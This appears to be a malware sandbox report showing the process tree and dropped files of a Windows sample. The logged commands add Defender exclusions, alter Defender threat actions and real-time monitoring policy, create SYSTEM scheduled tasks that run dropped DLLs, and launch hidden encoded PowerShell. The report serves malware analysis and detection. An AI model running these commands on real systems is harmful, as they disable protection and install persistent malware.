                                                              • System Location Discovery: System Language Discovery
                                                              PID:748
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2248
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2488
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2292
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:596
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                                PID:2256
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FjYcCGTppOUn" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                  PID:2428
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FjYcCGTppOUn" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:860
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OmYhQlgyU" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2376
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OmYhQlgyU" /t REG_DWORD /d 0 /reg:64
                                                                    4⤵
                                                                      PID:2608
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dBdCwOiUpBsdC" /t REG_DWORD /d 0 /reg:32
                                                                      4⤵
                                                                        PID:1788
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dBdCwOiUpBsdC" /t REG_DWORD /d 0 /reg:64
                                                                        4⤵
                                                                          PID:2380
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZOpYAGqatpU2" /t REG_DWORD /d 0 /reg:32
                                                                          4⤵
                                                                            PID:2592
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZOpYAGqatpU2" /t REG_DWORD /d 0 /reg:64
                                                                            4⤵
                                                                              PID:2216
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eZNCfusnXmtZMmVB" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:2312
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eZNCfusnXmtZMmVB" /t REG_DWORD /d 0 /reg:64
                                                                              4⤵
                                                                                PID:2184
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                4⤵
                                                                                  PID:1576
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:1160
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc" /t REG_DWORD /d 0 /reg:32
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:2900
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc" /t REG_DWORD /d 0 /reg:64
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:2868
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:32
                                                                                  4⤵
                                                                                    PID:2812
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:64
                                                                                    4⤵
                                                                                      PID:2912
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /CREATE /TN "gEFRKurQb" /SC once /ST 06:57:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                    3⤵
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:920
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /run /I /tn "gEFRKurQb"
                                                                                    3⤵
                                                                                      PID:2220
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /DELETE /F /TN "gEFRKurQb"
                                                                                      3⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:1552
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                      3⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:2352
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                        4⤵
                                                                                          PID:1812
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                        3⤵
                                                                                          PID:2340
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1972
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /CREATE /TN "tgKluuvSNQRGAHQwW" /SC once /ST 19:42:50 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wGQmUIZKEGuxadPB\heSZBZIzLRRKNsz\mAxzPSG.exe\" fN /LxIGdidHU 525403 /S" /V1 /F
                                                                                          3⤵
                                                                                          • Drops file in Windows directory
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:1728
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /run /I /tn "tgKluuvSNQRGAHQwW"
                                                                                          3⤵
                                                                                            PID:2196
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 680
                                                                                            3⤵
                                                                                            • Loads dropped DLL
                                                                                            • Program crash
                                                                                            PID:1672
                                                                                        • C:\Windows\Temp\wGQmUIZKEGuxadPB\heSZBZIzLRRKNsz\mAxzPSG.exe
                                                                                          C:\Windows\Temp\wGQmUIZKEGuxadPB\heSZBZIzLRRKNsz\mAxzPSG.exe fN /LxIGdidHU 525403 /S
                                                                                          2⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          • Drops Chrome extension
                                                                                          • Drops file in System32 directory
                                                                                          • Drops file in Program Files directory
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:1620
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                            3⤵
                                                                                              PID:1616
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        4⤵
        • Indirect Command Execution
        • System Location Discovery: System Language Discovery
        PID:2416
        • C:\Windows\SysWOW64\cmd.exe
          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
          5⤵
          • System Location Discovery: System Language Discovery
          PID:2304
          • \??\c:\windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
            6⤵
            • System Location Discovery: System Language Discovery
            PID:836
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        4⤵
        • Indirect Command Execution
        PID:900
        • C:\Windows\SysWOW64\cmd.exe
          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
          5⤵
          • System Location Discovery: System Language Discovery
          PID:2636
          • \??\c:\windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
            6⤵
            PID:2112
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        4⤵
        • Indirect Command Execution
        • System Location Discovery: System Language Discovery
        PID:1864
        • C:\Windows\SysWOW64\cmd.exe
          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
          5⤵
          • System Location Discovery: System Language Discovery
          PID:2152
          • \??\c:\windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
            6⤵
            • System Location Discovery: System Language Discovery
            PID:1740
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        4⤵
        • Indirect Command Execution
        PID:1880
        • C:\Windows\SysWOW64\cmd.exe
          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
          5⤵
          PID:2268
          • \??\c:\windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
            6⤵
            • System Location Discovery: System Language Discovery
            PID:748
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        4⤵
        • Indirect Command Execution
        • System Location Discovery: System Language Discovery
        PID:2616
        • C:\Windows\SysWOW64\cmd.exe
          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
          5⤵
          • System Location Discovery: System Language Discovery
          PID:2612
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell start-process -WindowStyle Hidden gpupdate.exe /force
            6⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:928
            • C:\Windows\SysWOW64\gpupdate.exe
              "C:\Windows\system32\gpupdate.exe" /force
              7⤵
              • System Location Discovery: System Language Discovery
              PID:1736
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "bQeBRIfYCApeQZGKek"
      3⤵
      PID:2164
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
      3⤵
      • System Location Discovery: System Language Discovery
      PID:2288
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
        4⤵
        • Indirect Command Execution
        PID:2420
        • C:\Windows\SysWOW64\cmd.exe
          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
          5⤵
          PID:2376
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
            6⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:820
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
              7⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:2176
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
        4⤵
        • Indirect Command Execution
        • System Location Discovery: System Language Discovery
        PID:1692
        • C:\Windows\SysWOW64\cmd.exe
          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
          5⤵
          • System Location Discovery: System Language Discovery
          PID:1652
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
            6⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2772
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
              7⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:2880
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\OmYhQlgyU\AvBchx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jYxDgykbLQIqEEE" /V1 /F
      3⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:2736
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "jYxDgykbLQIqEEE2" /F /xml "C:\Program Files (x86)\OmYhQlgyU\EKqdWeJ.xml" /RU "SYSTEM"
      3⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:824
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /END /TN "jYxDgykbLQIqEEE"
      3⤵
      PID:2268
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "jYxDgykbLQIqEEE"
      3⤵
      • System Location Discovery: System Language Discovery
      PID:1300
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "OibvKUbCFWAeNZ" /F /xml "C:\Program Files (x86)\rZOpYAGqatpU2\lUFbVOw.xml" /RU "SYSTEM"
      3⤵
      • Scheduled Task/Job: Scheduled Task
      PID:928
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "SgTldWdJyDXUX2" /F /xml "C:\ProgramData\eZNCfusnXmtZMmVB\qmhQqLJ.xml" /RU "SYSTEM"
      3⤵
      • Scheduled Task/Job: Scheduled Task
      PID:1616
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "wmWRqWhgZsXCMPdXZ2" /F /xml "C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR\EbEXBrU.xml" /RU "SYSTEM"
      3⤵
      • Scheduled Task/Job: Scheduled Task
      PID:1100
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "RJVImfMUYoaVBdYkcUO2" /F /xml "C:\Program Files (x86)\dBdCwOiUpBsdC\mHghyaQ.xml" /RU "SYSTEM"
      3⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:1872
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "POGTAxIfkFSBYDVsP" /SC once /ST 00:21:58 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wGQmUIZKEGuxadPB\dUjFsKnT\XafmaoT.dll\",#1 /IErdida 525403" /V1 /F
      3⤵
      • Drops file in Windows directory
      • Scheduled Task/Job: Scheduled Task
      PID:2600
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "POGTAxIfkFSBYDVsP"
      3⤵
      • System Location Discovery: System Language Discovery
      PID:1572
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "tgKluuvSNQRGAHQwW"
      3⤵
      PID:2700
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1620 -s 1572
      3⤵
      • Loads dropped DLL
      • Program crash
      PID:2156
  • C:\Windows\system32\rundll32.EXE
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wGQmUIZKEGuxadPB\dUjFsKnT\XafmaoT.dll",#1 /IErdida 525403
    2⤵
    PID:1268
    • C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wGQmUIZKEGuxadPB\dUjFsKnT\XafmaoT.dll",#1 /IErdida 525403
      3⤵
      • Blocklisted process makes network request
      • Checks BIOS information in registry
      • Loads dropped DLL
      • Drops file in System32 directory
      • Enumerates system info in registry
      • Modifies data under HKEY_USERS
      PID:2712
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "POGTAxIfkFSBYDVsP"
        4⤵
        • System Location Discovery: System Language Discovery
        PID:2708
• C:\Windows\system32\taskeng.exe
  taskeng.exe {13A2C9A9-E344-49CB-9AC9-377B3577710F} S-1-5-21-2257386474-3982792636-3902186748-1000:CTBHAMHL\Admin:Interactive:[1]
  1⤵
  PID:968
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    2⤵
    • Command and Scripting Interpreter: PowerShell
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:340
    • C:\Windows\system32\gpupdate.exe
      "C:\Windows\system32\gpupdate.exe" /force
      3⤵
      PID:1508
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    2⤵
    • Command and Scripting Interpreter: PowerShell
                                                                                                              • Drops file in System32 directory
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:1652
                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                3⤵
                                                                                                                  PID:2868
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                2⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Drops file in System32 directory
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:660
                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                  3⤵
                                                                                                                    PID:1588
                                                                                                              • C:\Windows\system32\gpscript.exe
                                                                                                                gpscript.exe /RefreshSystemParam
                                                                                                                1⤵
                                                                                                                  PID:1592
                                                                                                                • C:\Windows\system32\gpscript.exe
                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                  1⤵
                                                                                                                    PID:2320
                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                    1⤵
                                                                                                                      PID:3028
                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe "-1829598672-9174819801173572599-1298833006-19345686111560422770-173545962-1303217234"
                                                                                                                      1⤵
                                                                                                                        PID:1880
                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe "531054384-4472519063154312363024819408786734-1438074446-1639446401284258247"
                                                                                                                        1⤵
                                                                                                                          PID:2612
                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe "16159057113662932451114735311-199320705113764731351192885558-123473489-914520030"
                                                                                                                          1⤵
                                                                                                                            PID:2736

                                                                                                                          Network

                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                          Downloads

                                                                                                                          • C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR\EbEXBrU.xml

                                                                                                                            Filesize

                                                                                                                            2KB


                                                                                                                          • C:\Program Files (x86)\OmYhQlgyU\EKqdWeJ.xml

                                                                                                                            Filesize

                                                                                                                            2KB


                                                                                                                          • C:\Program Files (x86)\dBdCwOiUpBsdC\mHghyaQ.xml

                                                                                                                            Filesize

                                                                                                                            2KB


                                                                                                                          • C:\Program Files (x86)\rZOpYAGqatpU2\lUFbVOw.xml

                                                                                                                            Filesize

                                                                                                                            2KB


                                                                                                                          • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                                            Filesize

                                                                                                                            2.5MB


                                                                                                                          • C:\ProgramData\eZNCfusnXmtZMmVB\qmhQqLJ.xml

                                                                                                                            Filesize

                                                                                                                            2KB


                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                                            Filesize

                                                                                                                            187B


                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                                            Filesize

                                                                                                                            136B


                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                                            Filesize

                                                                                                                            150B


                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                            Filesize

                                                                                                                            10KB


                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                            Filesize

                                                                                                                            28KB


                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                            Filesize

                                                                                                                            7KB


                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                            Filesize

                                                                                                                            7KB


